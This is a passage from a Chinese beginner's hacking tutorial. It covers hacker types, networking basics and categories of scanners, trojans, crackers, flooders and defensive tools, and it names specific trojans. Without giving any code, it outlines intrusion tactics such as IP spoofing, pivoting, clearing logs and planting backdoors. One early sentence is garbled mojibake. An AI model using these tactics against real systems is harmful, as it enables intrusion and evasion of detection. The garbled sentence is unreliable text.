菜鸟变黑客终极教程


1 菜 鸟 变 黑 客 终 极 教 程 ! 首先,呵呵,说明一下,转贴,适合菜鸟!!这是菜鸟一定要学的最基础知识!!如果这个最 基本你都不想看,脑子里只想着刷 Q 币赚钱,那你不要来看了,回家种田去吧! 记住了,不要看到这么多的文字,就后退了,也许你刚开始满怀激情,但看到一半受不了, 没有耐心和学习的欲望是永远不成功的! 如果你看了眼睛痛,你可以把它复制下来,慢慢看!看完后,你收获很大的!!! 好,开始............. 一.黑客的分类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依*自己掌握的知识帮助 系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻 击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》, 所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听 说的“黑客”(Cacker)和“红客”(Hacker)。 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都 是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点 和目的不一样而已。 很多人曾经饰遥骸白龊诳推绞倍甲鍪裁矗渴遣皇非常刺激?”也有人对黑客的理解是“天天 做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习, 我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所 以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才 可能自己体会出一些只可意会、不可言传的心得? 在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情, 根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种: 一、学习技术 互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所 说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否 则一旦停止学习,那么依*他以前掌握的内容,并不能维持他的“黑客身份”超过一年。 初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基 本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深 的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能 贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。 二、伪装自己: 2 黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身 份,这需要有熟练的技巧,用来伪装自己的 IP 地址、使用跳板逃避跟踪、清理记录扰乱对 方线索、巧妙躲开防火墙等。 伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就 是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进 行攻击,否则一旦自己的行迹败露,最终害的害是自己。 如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是 一种学习,而不是一种犯罪。 三、发现漏洞: 漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏 洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通 过漏洞进行破坏或着修补上这个漏洞。 黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑 客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的 程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。 四、利用漏洞: 对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本 前提是“利用漏洞”,黑客利用漏洞可以做下面的事情: 1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统; 2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器; 3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管 的服务器作为工具,寻找并入侵下一个系统; 4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出 一些维护网络安全的事情; 5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有 利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服 务器他们决不留情,系统崩溃会让他们感到无限的快感! ================================================== 二.黑客应掌握的基本技能 从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必 须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容 易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的 内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内 容。 一、了解一定量的英文: 3 学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客 的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在 这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候, 这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文 软件、并且及时关注国外著名的网络安全网站。 二、学会基本软件的使用: 这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如 ftp、 ping、net 等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描 器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后 面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己 的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。 三、初步了解网络协议和工作原理: 所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知 识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建 议学习者初步了解有关 tcp/ip 协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏 览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部 分内容将会在后面的章节中进行具体介绍。 四、熟悉几种流行的编程语言和脚本: 同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执 行结果就可以了。建议学习者初步学习 C 语言、asp 和 cgi 脚本语言,另外对于 htm 超文本 语言和 php、java 等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语 言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习 C 语言和 htm 超文本语言。 五、熟悉网络应用程序: 网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache 等服务器后台;还有网 上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并 运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依*理论学 习要容易许多,能够达到事半功倍的效果! ================================================== 网络安全术语解释 一、协议: 网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信 4 息交换,这种物理设备包括最常见的电缆、光缆、无线 WAP 和微波等,但是单纯拥有这些 物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换 还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有 了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。 这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如 没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样, 它们通过各种预先规定的协议完成不同的使命,例如 RFC1459 协议可以实现 IRC 服务器与 客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运 作机理的目的。 每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建 立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入 手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全 问题而被黑客利用。 对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因 而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜 绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。 二、服务器与客户端: 最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户 端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将 执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站 服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持, 而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它 们之间具有相同的功能,对等的完成连接和信息交换工作。例如 DCC 传输协议即属于此种 类型。 从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的 上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏 览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电 脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。 三、系统与系统环境: 电脑要运作必须安装操作系统,如今流行的操作系统主要由 UNIX、Linux、Mac、BSD、 Windows2000、Windows95/98/Me、Windows NT 等,这些操作系统各自独立运行,它们有 自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为 服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。 不同的操作系统配合不同的应用程序就构成了系统环境,例如 Linux 系统配合 Apache 软件 可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务 器上供浏览者阅读的文本信息;再如 Windows2000 配合 Ftpd 软件可以将电脑构设成一台文 5 件服务器,通过远程 ftp 登陆可以获得系统上的各种文件资源等。 四、IP 地址和端口: 我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目, 都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要 的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到 IP 地址了。 每一台上网的电脑都具有独一无二的 IP 地址,这个地址类似于生活中人们的家庭地址,通 过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个 电脑之间的信息交换工作,因为他们的 IP 地址不同,所以不会出现找不到目标的混乱局面。 但是黑客可以通过特殊的方法伪造自己电脑的 IP 地址,这样当服务器接受到黑客电脑(伪 IP 地址)的请求后,服务器会将应答信息传送到伪 IP 地址上,从而造成网络的混乱。当然, 黑客也可以根据 IP 地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实 中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己 IP 地址》的文章。 接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这 好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会 在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服 务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户 端请求。 网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服 务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成 这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现, 即“隐藏的端口”,故“后门”。 每一台电脑都可以打开 65535 个端口,因而理论上我们可以开发出至少 65535 种不同的网络 服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客 户端和服务端都使用的是 80 号端口,进行 IRC 聊天则在服务端使用 6667 端口、客户端使 用 1026 端口等。 五、漏洞: 漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽 某些网络应用程序中的账号;Perl 程序漏洞则可能是由于程序员在设计程序的时候考虑情况 不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或 者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊 IP 包炸弹实际上是程序在分析某些特殊数据的时候出现错误等…… 总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是 利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。 黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”, 他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应 该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身 此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才 6 对黑客有了畏惧和敌视的心理。 六、加密与解密: 在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题 是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在 众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到, 如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的 时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。 正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的 信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。 网络上最长使用的是设置个人密码、使用 DES 加密锁,这两种加密方式分别可以完成用户 登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏 洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一 仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷, 黑客也在寻找破解这些系统的种种办法。 可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好, 将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行, 本书将会侧重学习“漏洞”方面的知识。 七、特洛伊木马: 特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于 特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是 特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊 木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论 如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊 木马与病毒区分开。 ================================================== 四.常用黑客软件性质分类 一、扫描类软件: 扫描是黑客的眼睛,通过扫描程序,黑客可以找到攻击目标的 IP 地址、开放的端口号、服 务器运行的版本、程序中可能存在的漏洞等。因而根据不同的扫描目的,扫描类软件又分为 地址扫描器、端口扫描器、漏洞扫描器三个类别。在很多人看来,这些扫描器获得的信息大 多数都是没有用处的,然而在黑客看来,扫描器好比黑客的眼睛,它可以让黑客清楚的了解 目标,有经验的黑客则可以将目标“摸得一清二楚”,这对于攻击来说是至关重要的。同时 扫描器也是网络管理员的得力助手,网络管理员可以通过它既是了解自己系统的运行状态和 可能存在的漏洞,在黑客“下手”之前将系统中的隐患清除,保证服务器的安全稳定。 7 现在网络上很多扫描器在功能上都设计的非常强大,并且综合了各种扫描需要,将各种功能 集成于一身。这对于初学网络安全的学习者来说无疑是个福音,因为只要学习者手中具备一 款优秀的扫描器,就可以将信息收集工作轻松完成,免去了很多繁琐的工作。但是对于一个 高级黑客来说,这些现成的工具是远远不能胜任的,他们使用的程序大多自己编写开发,这 样在功能上将会完全符合个人意图,而且可以针对新漏洞既是对扫描器进行修改,在第一时 间获得最宝贵的目标资料。本书此部分将会介绍扫描器的具体使用方法,而在第二部分中则 会具体讲述如何开发这些扫描器,请读者务必循序渐进,否则将会给自己的学习带来很多不 必要的烦恼。 二、远程监控类软件: 远程监控也叫做“木马”,这种程序实际上是在服务器上运行一个客户端软件,而在黑客的 电脑中运行一个服务端软件,如此一来,服务器将会变成黑客的服务器的“手下”,也就是 说黑客将会利用木马程序在服务器上开一个端口,通过这种特殊的木马功能对服务器进行监 视、控制。因此,只要学习者掌握了某个木马的使用和操作方法,就可以轻易接管网络服务 器或者其他上网者的电脑。 在控制了服务器之后,黑客的攻击行动也就接近尾声了,然而在做这件事情之前,黑客必须 想办法让服务器运行自己木马的那个“客户端程序”,这就需要利用漏洞或者进行欺骗。欺 骗最简单,就是想办法让操作服务器的人(系统管理员之类)运行黑客的客户端程序,而利 用漏洞则要初学者阅读完本书后面的内容才能够做到了。 三、病毒和蠕虫: 首先声明一下:编写病毒的做法并不属于黑客。病毒只不过是一种可以隐藏、复制、传播自 己的程序,这种程序通常具有破坏作用,虽然病毒可以对互联网造成威胁,然而它并没有试 图寻找程序中的漏洞,所以制作病毒还有病毒本身对黑客的学习都没有实际意义。 之所以提到病毒,是因为蠕虫和病毒有很多相似性,如虫也是一段程序,和病毒一样具有隐 藏、复制、船舶自己的功能。不同的是蠕虫程序通常会寻找特定的系统,利用其中的漏洞完 成传播自己和破坏系统的作用,另外蠕虫程序可以将收到攻击的系统中的资料传送到黑客手 中,这要看蠕虫设计者的意图,因而蠕虫是介于木马和病毒之间的一类程序。 计算机蠕虫是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到 其他的计算机系统中(通常是经过网络连接)。蠕虫的制造需要精深的网络知识,还要具备高 超的编程水平,对于一个初学黑客的学习者来说,蠕虫的制造和使用都是非常难理解的,并 且大多数蠕虫攻击的对象是 Linux 系统,而本书所使用的学习平台是 Windows 95/98 或 Windows NT/2000,因而我同样建议初学者不要过多的涉及这部分内容,有关此部分内容也 将会在《攻学兼防》的第二部分中有所介绍。 四、系统攻击和密码破解: 这类软件大多数都是由高级黑客编写出来的,供初级黑客使用的现成软件,软件本身不需要 使用者具备太多的知识,使用者只要按照软件的说明操作就可以达到软件的预期目的,因而 8 这类软件不具备学习黑客知识的功效。不过这类软件对于黑客很重要,因为它可以大幅度减 小黑客的某些繁琐工作,使用者经过对软件的设置就可以让软件自动完成重复的工作,或者 由软件完成大量的猜测工作,充分利用剩余时间继续学习网络知识。 系统攻击类软件主要分为信息炸弹和破坏炸弹。网络上常见的垃圾电子邮件就是这种软件的 “杰作”,还有聊天室中经常看到的“踢人”、“骂人”类软件、论坛的垃圾灌水器、系统蓝 屏炸弹也都属于此类软件的变异形式。如果学习者能够认真学习黑客知识,最终可以自己编 写类似的工具,但如果某个人天天局限于应用此类软件上,他将永远是一个“伪黑客”。 密码破解类软件和上面的软件一样,完全依*它将对学习黑客毫无帮助。对于真正的黑客来 说,这种软件可以帮助寻找系统登陆密码,相对于利用漏洞,暴力破解密码要简单许多,但 是效率会非常低,但是真正的黑客无论是使用密码破解软件还是利用漏洞进入系统之后,都 达到了自己入侵的目的,因此对于如何进入系统,对于某些溺爱系统攻击的黑客来说无关紧 要。值得一提的是:真正执著于漏洞分析的黑客是从来不使用这种软件的,而我向来将分析 漏洞作为至高无上的工作,所以也尽量不去接触此类软件。 五、监听类软件: 通过监听,黑客可以截获网络的信息包,之后对加密的信息包进行破解,进而分析包内的数 据,获得有关系统的信息;也可能截获个人上网的信息包,分析的到上网账号、系统账号、 电子邮件账号等个人隐私资料。监听类软件最大的特点在于它是一个亦正亦邪的,因为网络 数据大多经过加密,所以用它来获得密码比较艰难,因而在更多的情况下,这类软件是提供 给程序开发者或者网络管理员的,他们利用这类软件进行程序的调试或服务器的管理工作。 ================================================== 五.常用黑客软件用途分类 一、防范: 这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口 管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐 私,不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的,如日志分析软件、系 统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。 二、信息搜集: 信息搜集软件种类比较多,包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件;还有监听、 截获信息包等间谍类软件,其大多数属于亦正亦邪的软件,也就是说无论正派黑客、邪派黑 客、系统管理员还是一般的电脑使用者,都可以使用者类软件完成各自不同的目的。在大多 数情况下,黑客使用者类软件的频率更高,因为他们需要依*此类软件对服务器进行全方位 的扫描,获得尽可能多的关于服务器的信息,在对服务器有了充分的了解之后,才能进行黑 客动作。 三、木马与蠕虫: 9 这是两种类型的软件,不过他们的工作原理大致相同,都具有病毒的隐藏性和破坏性,另外 此类软件还可以由拥有控制权的人进行操作,或由事先精心设计的程序完成一定的工作。当 然这类软件也可以被系统管理员利用,当作远程管理服务器的工具。 四、洪水: 所谓“洪水”即信息垃圾炸弹,通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃, 近年来网络上又开始流行 DOS 分散式攻击,简单地说也可以将其归入此类软件中。洪水软 件还可以用作邮件炸弹或者聊天式炸弹,这些都是经过简化并由网络安全爱好者程序化的 “傻瓜式”软件,也就是本书一开始指责的“伪黑客”手中经常使用的软件。 五、密码破解: 网络安全得以保证的最实用方法是依*各种加密算法的密码系统,黑客也许可以很容易获得 一份暗文密码文件,但是如果没有加密算法,它仍然无法获得真正的密码,因此使用密码破 解类软件势在必行,利用电脑的高速计算能力,此类软件可以用密码字典或者穷举等方式还 原经过加密的暗文。 六、欺骗: 如果希望获得上面提到的明文密码,黑客需要对暗文进行加密算法还原,但如果是一个复杂 的密码,破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型,是 不是更加方便?欺骗类软件就是为了完成这个目的而设计的。 七、伪装: 网络上进行的各种操作都会被 ISP、服务器记录下来,如果没有经过很好的伪装就进行黑客 动作,很容易就会被反跟踪技术追查到黑客的所在,所以伪装自己的 IP 地址、身份是黑客 非常重要的一节必修课,但是伪装技术需要高深的网络知识,一开始没有坚实的基础就要用 到这一类软件了。 ================================================== 学习黑客的基本环境 一、操作系统的选择: 我们经常听说黑客酷爱 Linux 系统,这是因为 Linux 相对 Windows 提供了更加灵活的操作 方式,更加强大的功能。例如对于 IP 地址的伪造工作,利用 Linux 系统编写特殊的 IP 头信 息可以轻松完成,然而在 Windows 系统下却几乎不可能做到。但是 Linux 也有它不足的一 10 面,这个系统的命令庞杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有 过多的人会放弃“舒适”的 Windows、放弃精彩的电脑游戏和便捷的操作方式,去全心投入 黑客学习中。而且对于初学黑客的学习者来说,大多数网络知识都可以在 Windows 系统中 学习,相对 Linux 系统,Windows 平台下的黑客软件也并不在少数,另外通过安装程序包, Windows 系统中也可以调试一定量的程序,因此初步学习黑客没有必要从 Linux 入手。 本书使用的平台 WindowsME,因为对于个人用户来说,NT 或者 2000 多少有些苛刻——系 统配置要求太高;然而使用 95 或者 98 又缺少某些必要的功能——NET、TELNET 命令不完 善。但是本书的大部分内容测试漏洞,从远程服务器出发,所以也不是非要 WindowsME 操 作系统进行学习,对于少数系统版本之间的差异,学习者可以和我联系获得相应系统的学习 方法。 二、需要的常用软件: 除了基本的操作系统以外,学习者还需要安装各类扫描器,之后下载一个比较优秀的木马软 件、一个监听类软件,除此以外别无它求。如果有必要,读者可以自行安装本文上述软件, 然后学习其用法,但是我要告诉你,对于各类炸弹、还有网络上各式各样的黑客软件,在学 习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软件。 对于扫描器和监听软件,我给出以下建议,并且在本书的后面还会对这几个软件进行详细介 绍: 扫描器: 监听软件: 木马: 三、额外的工具: 如果可以安装下面的工具,将会对学习黑客有莫大的帮助,当然下面的软件主要是学习额外 内容并为“第二部分”学习作铺垫用的,所以没有也不会妨碍本书的学习。 1、后台服务器: 拥有某些网络应用的后台服务程序,可以将自己的电脑设置成一个小型服务器,用来学习相 应的网络应用,从“内部”了解其运作机理,这将会大大提高自己对服务器的感性认识,同 时还能够在激活服务器的时候;监测自己服务器上的数据,如果有其他黑客来攻击,则可以 清晰的记录下对方的攻击过程,从而学习到更多的黑客攻击方法。对于本书而言,主要介绍 网站的 Perl 和 asp 等脚本语言漏洞,所以可以安装一个 IIS 或者 HTTPD。然后在安装 ActivePerl,使自己的服务器具备编译 cgi 和 pl 脚本的能力。使用自己的服务器还有一个好 处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、 有不会对网络构成威胁,一举两得。 2、C 语言编译平台: 11 今后在学习黑客的路途中,将会遇到很多“属于自己的问题”,这些问题网络上的其他人可 能不会注意,所以无法找到相应的程序,这个时候学习者就要自己动手开发有关的工具了, 所以安装一个 Borland C++将会非常便捷,通过这个编译器,学习者既可以学习 C 语言,也 能够修改本书后面列出的一些小程序,打造一个属于自己的工具库。 四、网络安全软件分类 现在我们来了解一下有关网络安全软件的分类,因为学习黑客知识是两个相互联系的过程: 既学习如何黑,还要学会如何防止被黑。 1、防火墙: 这是网络上最常见的安全机制软件,防火墙有硬件的、也有软件的,大多数读者看到的可能 更多都是软件防火墙。其功能主要是过滤垃圾信息(保证系统不会受到炸弹攻击)、防止蠕 虫入侵、防止黑客入侵、增加系统隐私性(对敏感数据进行保护)、实时监控系统资源,防 止系统崩溃、定期维护数据库,备份主要信息……防火墙可以将系统本身的漏洞修补上,让 黑客没有下手的机会。另外对于拥有局域网的企业来说,防火墙可以限制系统端口的开放, 禁止某些网络服务(杜绝木马)。 2、检测软件: 互联网上有专门针对某个黑客程序进行清除的工具,但是这类软件更多是集成在杀毒软件或 者防火墙软件内的,对于系统内的木马、蠕虫可以进行检测并清除,软件为了保护系统不受 侵害,会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放 状态等。如果用户需要,软件还可以编写有关的脚本对指定端口进行屏蔽(防火墙一样具备 此功能)。 3、备份工具: 专门用来备份数据的工具可以帮助服务器定期备份数据,并在制定时间更新数据,这样即便 黑客破坏了服务器上的数据库,软件也可以在短时间内完全修复收到入侵的数据。另外对于 个人用户,这类软件可以对硬盘进行完全映像备份,一旦系统崩溃,用户利用这类软件可以 将系统恢复到原始状态,例如 Ghost 就是这类软件中的佼佼者。 4、日志纪录、分析工具: 对于服务器来说,日志文件是必不可少的,管理员可以通过日志了解服务器的请求类型和请 求来源,并且根据日志判断系统是否受到黑客攻击。通过日志分析软件,管理员可以轻松的 对入侵黑客进行反追踪,找到黑客的攻击来源,进而抓不黑客。这也就是为什么黑客在攻击 的时候多采用 IP 地址伪装、服务器跳转,并在入侵服务器之后清除日志文件的原因。 ================================================== 网络流行黑客软件简介 12 (因主要教大家防御而不是攻击,因此暂时不提供相关的软件下载,需要研究的朋友可以去 网络搜索。稍后将有软件的详细使用说明) 一、国产经典软件简介(先介绍写老软件,但其在国产黑客业内有举足轻重的作用。) 溯雪 密码探测器:利用溯雪可以轻松的完成基于 web 形式的各种密码猜测工作,例如 email、forum 中的注册用户密码等。软件采取多线程编写,除了支持字典和穷举以外,软件最大的特色是 可以自己编写猜测规则,例如可以按照中文拼音或者英文单词拼写规则随机组合出字典文 件,最大程度上保证了猜测的准确性。 乱刀 密码破解:乱刀可以破解 unix 系统中的密码暗文,对于取得了 etc/passwd 文件的黑客来说 这是必不可少的。 天网 防火墙软件:中国第一套通过公安部认证的软硬件集成防火墙,能有效的防止黑客入侵,抵 御来自外部网络的攻击,保证内部系统的资料不被盗取,它根据系统管理者设定的安全规则 把守企业网络,提供强大的访问控制、身份认证、应用选通、网络地址转换、信息过滤、虚 拟专网、流量控制、虚拟网桥等功能。 冰河 木马类软件:国内响当当的木马软件,知名度绝不亚于 BO,主要用于远程监控。自动跟踪 屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、任意操作文件及注册表、远 程关机、发送信息等多种监控功能。此软件的一大特色是可以由使用者自己设置需要占用的 端口,如此一来监控类软件就很难从端口号上直接判断系统是否存在冰河了。 小分析家 监测类软件:免费网络协议分析工具,这个工具的特点是界面简单实用,与国外的一些 sniffer 产品相比,如 Netxray,结果更为直观。此软件为免费版本,只能运行在 NT 系统下,同时 编写此软件的公司还提供了软件的商业版本“网警”。 快速搜索 端口扫描器:快速搜索是一个在网络上搜索服务器的软件,可以根据给定的地址和端口号查 找机器。具有多线程同时搜索技术,可以将搜索速度提高到单线程的十倍以上。 其他:针对 2000/XP 扫描的 D-TOOLS 等。 二、常见网络安全软件简介 13 Local Port Scanner 本地端口扫描器:通过这个软件可以监测本地电脑被打开的端口。此软件可以监测大多数黑 客入侵或者木马占用的端口,它有五种不同的扫描方式并可以获得有关端口的详细扫描信 息。 A-spy 系统进程察看器:A-spy 可以监测 Windows 系统启动过程中调用的所有程序、执行的进程, 并将结果保存在日志文件中。这个软件的用途是检察系统是否被安置了木马程序,同时软件 还可以对系统启动需要调用的程序进行增加、删除和编辑等操作,改变调用程序之间的先后 顺序,软件支持包括 NT、2000 在内的所有 Windows 平台,具有 17 种方式清楚木马程序。 Netmon 图形化 Netstat 命令:Netmon 是图形化的 Netstat 命令,它运行在 Windows 系统中,可以察 看系统的 TCP、UDP 连接状态,同时此软件提供了一份完整的木马、蠕虫占用端口清单, 可以快速了解系统是否存在安全问题。 LANguard Network Scanner 局域网资料收集器:LANguard 允许使用者扫描局域网内部的搜索电脑,搜集他们的 netbios 信息、打开端口、共享情况和其他相关资料,这些资料及可以被黑客利用进行攻击,也可以 被管理员利用进行安全维护,通过它可以强行关闭指定端口和共享目录。 Leechsoft's NetMonitor TCP/IP 状态分析程序:这个软件使用于系统安全管理员、网络程序开发员、一般的拥护。 此工具可以显示电脑在上网状态下存在的 TCP/IP 连接,同时还能分析是否有其他人正在监 视上网者电脑中的某个端口,同时此工具内部还有一个功能强大的端口扫描程序。 Win Trinoo Server Sniper 清除 Win.Trinoo Server 程序:Win.Trinoo 是一个类似 DOS 攻击的木马程序,被植入它的电 脑将变成一台 Win.Trinoo Server,黑客通过这个 Server 能够“借刀杀人”攻击其他电脑系统。 Win Trinoo Server Sniper 可以高速的监测电脑是否存在此问题。 SubSeven Server Sniper 清除 SubSeven Server 程序:同上面的工具一样,SubSeven 也是一个木马程序,而 